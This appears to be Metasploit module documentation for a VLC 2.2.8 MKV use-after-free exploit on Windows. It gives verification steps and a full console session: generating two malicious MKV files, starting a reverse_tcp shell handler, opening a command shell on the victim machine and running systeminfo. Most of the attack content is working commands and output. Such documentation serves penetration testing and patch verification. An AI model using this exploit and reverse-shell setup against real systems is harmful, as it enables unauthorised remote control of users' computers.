## Description

VideoLAN VLC <= v2.2.8 (32 and 64 bit) are vulnerable to a use-after-free vulnerability that exists in the parsing of MKV files.

This module has been tested against 32 and 64 bit versions of VLC v2.2.8 on Windows 10 Pro x64.

## Vulnerable Application

[VLC](https://get.videolan.org/vlc/) <= v2.2.8

## Verification Steps

- `./msfconsole -q`
- `use exploit/windows/fileformat/vlc_mkv`
- `run`
- Start handler
- Copy over mkv files to target hosts and open part1 in VLC
- Set a shell

## Scenarios

### Windows 10 x64 running VLC 2.2.8 (x64)

```
msf5 > use exploit/windows/fileformat/vlc_mkv
msf5 exploit(windows/fileformat/vlc_mkv) > set lhost 172.22.222.134 
lhost => 172.22.222.134
msf5 exploit(windows/fileformat/vlc_mkv) > run

[+] tjub-part1.mkv stored at /home/msfdev/.msf4/local/tjub-part1.mkv
[*] Created tjub-part1.mkv. Target should open this file
[+] tjub-part2.mkv stored at /home/msfdev/.msf4/local/tjub-part2.mkv
[*] Created tjub-part2.mkv. Put this file in the same directory as tjub-part1.mkv
[*] Appending blocks to tjub-part1.mkv
[+] Successfully appended blocks to tjub-part1.mkv
msf5 exploit(windows/fileformat/vlc_mkv) > handler -p windows/x64/shell/reverse_tcp -H 172.22.222.134 -P 4444
[*] Payload handler running as background job 0.
msf5 exploit(windows/fileformat/vlc_mkv) > 
[*] Started reverse TCP handler on 172.22.222.134:4444 
[*] Sending stage (336 bytes) to 172.22.222.200
[*] Command shell session 2 opened (172.22.222.134:4444 -> 172.22.222.200:49731) at 2018-10-10 12:08:58 -0500
sessions -i 2
[*] Starting interaction with 2...

systeminfo
systeminfo

Host Name:                 DESKTOP-IPOGIJR
OS Name:                   Microsoft Windows 10 Pro
OS Version:                10.0.17134 N/A Build 17134
```
